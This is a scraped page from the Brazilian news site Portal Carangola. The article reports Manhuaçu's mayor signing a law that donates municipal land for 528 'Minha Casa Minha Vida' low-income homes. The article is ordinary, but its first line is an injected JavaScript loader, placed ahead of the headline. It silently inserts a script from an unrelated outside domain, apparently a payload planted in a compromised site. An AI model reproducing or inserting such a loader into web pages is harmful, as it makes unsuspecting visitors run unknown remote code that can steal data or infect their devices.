;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nailton Heringer sanciona Lei que beneficiará 528 famílias. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Nailton Heringer sanciona Lei que beneficiará 528 famílias.

Prefeitura doa área de 12 mil m², que serão destinados a unidades habitacionais para população de baixa renda, através do Programa ”Minha Casa Minha Vida”

Na manhã desta segunda-feira (17), o prefeito Nailton Heringer sancionou a lei 3.374/14, que autoriza o Poder Executivo a doar área de 12  mil metros quadrados, de propriedade do município, ao Fundo de Arrendamento Residencial (FAR), gerido pela Caixa Econômica Federal.

Participaram do ato, o prefeito de Manhuaçu, Nailton Heringer; os gerentes da Caixa de Manhuaçu, Flávio Celestino, Éder e Tatiana; e os secretários municipais Macilon Breder, Luiz Carlos Rhodes, João Amâncio e o coordenador do Creas, Wagner Alves Caldeira.

O imóvel doado destina-se exclusivamente a edificação de unidades habitacionais de interesse social, destinadas à população de baixa renda, através do programa ”Minha Casa Minha Vida”, do Governo Federal, a ser executado pelo município de Manhuaçu, juntamente com o FAR, através da Caixa Econômica Federal.

No ano passado, o município de Manhuaçu já havia celebrado com o Governo Federal, através da Secretaria Nacional de Habitação, termo de adesão visando atender as disposições legais previstas na Lei que criou o Programa “Minha Casa, Minha Vida”. A lei sancionada nesta segunda-feira (17) permite a ampliação do programa, passando de 288 unidades para 528 unidades habitacionais.

Os beneficiários do Programa “Minha Casa Minha Vida” serão selecionados pela Secretaria Municipal do Trabalho e Desenvolvimento Social, mediante critérios técnicos e objetivos, dentre os quais devem constar os indicados pela Caixa Econômica Federal.

 

BENEFÍCIOS PARA A POPULAÇÃO DE BAIXA RENDA

De acordo com o gerente geral da agência da Caixa Econômica Federal de Manhuaçu, Flávio Celestino, o primeiro passo já foi dado. “O programa atenderá 528 famílias, atingindo cerca de aproximadamente duas mil pessoas. O prazo para construção será contado a partir do momento em que a empresa vencer o certame e pode variar entre 18 a 24 meses para a entrega dos imóveis”, citou.

O prefeito de Manhuaçu, Nailton assegurou que o objetivo do governo municipal é atender o déficit habitacional existente em Manhuaçu. ”Vamos atender à população, que mora de aluguel social ou em condições precárias, e moradores de outras áreas ribeirinhas. Dessa forma, vamos realizar o sonho de muitos manhuaçuenses, que é o de adquirir a casa própria”, disse o prefeito Nailton Heringer.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.